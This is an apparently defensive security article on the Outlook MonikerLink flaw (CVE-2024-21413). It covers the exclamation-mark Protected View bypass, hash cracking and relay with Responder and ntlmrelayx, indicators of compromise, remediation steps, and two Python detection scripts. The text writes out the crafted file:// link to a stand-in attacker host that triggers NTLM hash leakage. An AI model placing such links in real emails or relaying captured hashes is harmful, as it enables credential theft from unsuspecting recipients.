CVE-2024-21413: Outlook MonikerLink NTLM Credential Theft
A single malicious hyperlink in an Outlook email — no click required, no attachment to open — silently leaks Windows NTLM credentials to any attacker who can send you an email
CVE-2024-21413, named 'MonikerLink' by Checkpoint Research, is a critical Microsoft Outlook vulnerability patched in February 2024 that allows an attacker to silently steal a victim's Windows NTLMv2 credentials by sending them a specially crafted email — no attachment to open, no macro to enable, and no hyperlink to click. Simply previewing the email in Outlook's Reading Pane is sufficient. The attack exploits a bypass in Outlook's Protected View mechanism using an exclamation mark appended to a file:// moniker URL, causing Windows to initiate an outbound NTLM authentication handshake to an attacker-controlled server and transmit the victim's Net-NTLMv2 hash.
The MonikerLink Mechanism: Exclamation Mark Bypass
Windows Monikers are COM object naming constructs that associate URL protocol schemes with object handlers. The file:// moniker causes Windows to initiate access to a UNC network path (\\server\share) via SMB, which triggers Windows NTLM authentication as part of the SMB protocol handshake.
Outlook normally identifies file:// URLs pointing to UNC paths as potentially dangerous and applies Protected View isolation — blocking automatic processing. CVE-2024-21413 bypasses this entirely. Checkpoint Research discovered that appending an exclamation mark and arbitrary text to the file:// URL — for example, `file:///\\attacker.com\share\file!arbitrary_text` — caused Outlook's URL classifier to misidentify the link type, bypassing the Protected View check.
When Outlook processes this link during email preview (an automatic action), it triggers the Windows file:// moniker handler. Windows initiates an SMB connection to the specified server. SMB authentication transmits the victim's Net-NTLMv2 hash as part of the standard Windows authentication challenge-response. The attacker's server captures this hash without the user clicking anything.
From Hash Capture to Credential Compromise
The captured Net-NTLMv2 hash is not the plaintext password, but it opens two distinct attack paths:
**Offline cracking**: Net-NTLMv2 hashes can be cracked with hashcat or John the Ripper. Common or moderate-complexity passwords crack in minutes to hours on modern GPU hardware. Any password under 8 characters or following common patterns is at high risk.
**NTLM Relay attacks**: The attacker can relay the captured authentication in real time to another service — for example, capturing the victim's authentication and immediately replaying it to the organization's Exchange server, SharePoint, or file shares to authenticate as the victim. Tools like Responder (for capture) and ntlmrelayx (for relay) are publicly available and widely used. Extended Protection for Authentication (EPA) on target services is the primary defense against relay.
For high-privilege targets (IT administrators, C-suite, service accounts), a captured and cracked or relayed hash can translate directly to domain-level access.
Historical Context: The Outlook NTLM Leak Pattern
CVE-2024-21413 is the latest in a series of Outlook vulnerabilities enabling NTLM credential theft via automatic content processing:
- **CVE-2023-23397** (March 2023, patched as an APT28 zero-day): Malicious calendar reminder with a UNC path in the reminder sound file field caused automatic NTLM authentication on reminder popup — no email open or click required.
- **CVE-2024-21413** (February 2024): Malicious file:// hyperlink with exclamation mark bypass in email body triggers NTLM authentication on email preview.
Both vulnerabilities exploit the fundamental behavior of Windows NTLM authentication — any application that triggers access to a UNC network path on behalf of a Windows user will cause that user's NTLM credentials to be transmitted to the path's server. Outlook's rich content processing repeatedly creates surfaces where attacker-controlled content can trigger this behavior.
Malicious Email Crafted
Attacker creates email body containing a hyperlink with crafted file:// moniker: file:///\\attacker-server\share\file!anytext. The exclamation mark suffix bypasses Outlook's URL safety classifier.
Email Delivered to Target
Email arrives in victim's inbox. No attachment, no macro, no suspicious indicator beyond a hyperlink that appears as a normal-looking file reference.
Outlook Previews Email — Moniker Processed
Victim selects the email in Outlook's Reading Pane (or opens it). Outlook processes the email body content including the file:// moniker. The exclamation mark bypass prevents Protected View from sandboxing the link.
Windows Initiates NTLM Authentication
Windows file:// moniker handler initiates an SMB connection to attacker's server. Windows NTLM challenge-response transmits the victim's Net-NTLMv2 hash — automatically, silently, before the user takes any further action.
Hash Cracked or Relayed
Attacker receives Net-NTLMv2 hash. Either cracks it offline to obtain plaintext password, or relays the authentication in real time to Exchange/SharePoint/file shares to access resources as the victim.
Indicators of Compromise
Detection for CVE-2024-21413 exploitation:
| Artifact | Telemetry source | Detection guidance |
|---|---|---|
| Email body hyperlinks containing file:// with UNC paths and exclamation mark suffix pattern | Email security gateway / content inspection | Pattern: file:///\\[external-hostname]\[share]\[file]![arbitrary] — any file:// link to an external host with exclamation mark suffix should be blocked at the email gateway |
| Outbound SMB (TCP 445) connections from workstations to external (non-RFC-1918) IP addresses | Firewall / network telemetry | External outbound SMB is almost universally anomalous; if outbound port 445 is not blocked at the perimeter, any such connection warrants investigation |
| Windows Security Event 4624 (Successful Logon) or 4625 (Failed Logon) with NTLM authentication type to unexpected destinations | Windows Security Event Log | NTLMv2 authentication attempts to non-corporate servers in Security log; correlate with Outlook process network activity |
| Outlook.exe initiating SMB connections without user-initiated file access action | EDR process-network correlation | Outlook making outbound port 445 connections during email preview without any user click on a file attachment is a direct exploitation indicator |
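The two network rows of the table expressed as detection logic, as an added example that is not from the article; the CSV schema, hostnames and telemetry lines are constructed, and documentation-range IPs stand in for internet addresses.

```python
"""Detection pass over process-network telemetry (added example; the CSV schema is
constructed for illustration and is not any EDR vendor's format). Implements the two
network indicators from the table: outbound TCP 445 to a non-RFC-1918 address from a
workstation, raised to high severity when the initiating process is Outlook."""
import csv
import io
import ipaddress

SMB_PORT = 445
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample telemetry; documentation-range IPs stand in for internet hosts.
SAMPLE_TELEMETRY = """\
ts,host,process,dst_ip,dst_port
2024-02-14T09:01:02Z,WS-0017,outlook.exe,203.0.113.7,445
2024-02-14T09:01:05Z,WS-0017,outlook.exe,10.10.5.21,443
2024-02-14T09:02:11Z,WS-0042,explorer.exe,192.168.4.9,445
2024-02-14T09:03:30Z,WS-0042,svchost.exe,198.51.100.12,445
2024-02-14T09:04:00Z,WS-0017,chrome.exe,203.0.113.7,443
"""

def is_rfc1918(ip: str) -> bool:
    """Checked against the three RFC 1918 blocks explicitly: Python's is_private also
    covers documentation ranges, which would hide the sample 'internet' addresses."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)

def classify_connection(process: str, dst_ip: str, dst_port: int):
    """Severity for one outbound connection, or None when it is not an indicator."""
    if dst_port != SMB_PORT or is_rfc1918(dst_ip):
        return None
    if process.lower() == "outlook.exe":
        return "high"    # Outlook speaking SMB to the internet: direct MonikerLink indicator
    return "medium"      # any other workstation process doing internet SMB is still anomalous

def detect_external_smb(telemetry_csv: str) -> list:
    """Return one alert dict per flagged connection, in log order."""
    alerts = []
    for row in csv.DictReader(io.StringIO(telemetry_csv)):
        severity = classify_connection(row["process"], row["dst_ip"], int(row["dst_port"]))
        if severity:
            alerts.append({"ts": row["ts"], "host": row["host"], "process": row["process"],
                           "dst_ip": row["dst_ip"], "severity": severity})
    return alerts

if __name__ == "__main__":
    for alert in detect_external_smb(SAMPLE_TELEMETRY):
        print(alert)
```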
Remediation
Steps in order of priority:
Apply February 2024 Patch Tuesday updates for Outlook and Office
The fix corrects the URL parsing logic that allowed the exclamation mark Protected View bypass. Verify via Office update history that the February 2024 CU is applied. The patch is delivered through standard Microsoft Update channels.
Block outbound SMB (TCP 445) at the perimeter firewall
Workstations should never initiate outbound SMB connections to the internet. Blocking TCP 445 outbound at the firewall prevents NTLM hash capture for CVE-2024-21413, CVE-2023-23397, and all similar vulnerabilities — and is a security baseline recommendation independent of any specific CVE. If outbound port 445 is currently permitted, this is an immediate misconfiguration to remediate.
Enable Extended Protection for Authentication (EPA) on internal services
EPA (also called Channel Binding) on Exchange, SharePoint, IIS, and file servers prevents NTLM relay attacks even when a hash is captured. Without EPA, a captured hash can be relayed to authenticate to internal services. Microsoft has enabled EPA by default on Exchange Server in recent updates — verify it is active.
Restrict NTLM authentication in Active Directory
Group Policy settings under Computer Configuration → Windows Settings → Security Settings → Local Policies → Security Options → Network Security: Restrict NTLM can limit where NTLM authentication is permitted. Consider blocking NTLM to internet destinations and evaluating NTLMv1 restriction or full NTLM deprecation in favor of Kerberos.
Deploy email gateway rules to detect MonikerLink patterns
Configure email security gateways to quarantine or strip emails containing file:// hyperlinks pointing to external hosts with exclamation mark suffixes. This pattern has no legitimate use in business email and should be blocked as a policy rule independent of this specific CVE.
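The gateway rule above, applied to the exclamation-mark link pattern from the mechanism section and the first row of the indicator table, as an added example (not from the article or Check Point's research); the internal allow-list, the verdict policy and the sample mail body are constructed.

```python
"""Gateway check for MonikerLink-style links (added example; not code from the article
or any vendor product). Flags file:// hyperlinks naming a UNC share with the '!' suffix;
a host outside the constructed allow-list or RFC 1918 space counts as external."""
import ipaddress
import re
from html.parser import HTMLParser

INTERNAL_SUFFIXES = (".corp.example", ".internal.example")  # constructed allow-list
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Matches file:///\\host\share\path!anything with either slash direction, any case.
MONIKER_RE = re.compile(r"^file:(?:/{2,3})?[\\/]{2}(?P<host>[^\\/]+)[\\/][^!]*!.*$", re.I)

class _HrefCollector(HTMLParser):
    # Collects href values of <a> tags; HTMLParser unescapes entities for us.
    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs.extend(v.strip() for k, v in attrs if k == "href" and v)

def is_external_host(host: str) -> bool:
    """External = a public IP (outside RFC 1918) or a DNS name not in the allow-list.
    Single-label names resolve through internal name services and count as internal."""
    h = host.strip().lower().rstrip(".")
    try:
        addr = ipaddress.ip_address(h)
        return not any(addr in net for net in RFC1918)
    except ValueError:
        return "." in h and not h.endswith(INTERNAL_SUFFIXES)

def find_monikerlinks(html_body: str) -> list:
    """One finding per file:// UNC hyperlink carrying a '!' suffix."""
    collector = _HrefCollector()
    collector.feed(html_body)
    return [{"href": h, "host": m.group("host"), "external": is_external_host(m.group("host"))}
            for h in collector.hrefs if (m := MONIKER_RE.match(h))]

def gateway_verdict(html_body: str) -> str:
    """Constructed policy: quarantine on an external MonikerLink, strip an internal one."""
    findings = find_monikerlinks(html_body)
    if any(f["external"] for f in findings):
        return "quarantine"
    return "strip-link" if findings else "deliver"

# Constructed sample body: one ordinary HTTPS link and one MonikerLink-style link.
SAMPLE_BODY = ('<p>Report: <a href="https://intranet.corp.example/q4">intranet</a> or '
               '<a href="file:///\\\\attacker.example\\share\\q4.docx!open">copy</a></p>')
```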
The bottom line
CVE-2024-21413 represents an attack category that confounds traditional security awareness training — there is no malicious attachment to avoid, no macro warning to dismiss, and no suspicious link to refuse to click. The credential theft happens automatically during normal email reading. Blocking outbound SMB at the perimeter is the single most impactful control and should already be in place as a security baseline. For organizations that do not currently block outbound port 445, discovering this via a MonikerLink attack is a far worse outcome than implementing the control proactively.
Frequently asked questions
Is CVE-2024-21413 related to CVE-2023-23397 (the Outlook calendar zero-day)?
They share the same class of attack — Outlook processing attacker-controlled content that triggers Windows NTLM authentication to an external server — but are distinct vulnerabilities using different attack surfaces. CVE-2023-23397 used malicious calendar reminder sound file paths. CVE-2024-21413 uses malicious hyperlinks in email bodies with a different Protected View bypass mechanism.
Can the Net-NTLMv2 hash captured by an attacker be used directly to log in?
Net-NTLMv2 hashes cannot be directly used for pass-the-hash authentication (unlike NTLM hashes). However, they can be cracked offline to reveal the plaintext password, or relayed in real time to authenticate as the victim to other services via NTLM relay attacks — a well-established attack technique using tools like Responder and ntlmrelayx.
Does this affect Outlook on the web (OWA) or Outlook for Mac?
No. CVE-2024-21413 affects the Windows Outlook desktop client only. Outlook on the web (OWA) runs in a browser sandbox that does not have access to Windows NTLM authentication. Outlook for Mac uses a different code base without Windows moniker processing and is not affected.

Founder & Cybersecurity Evangelist, Decryption Digest
Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals weekly.
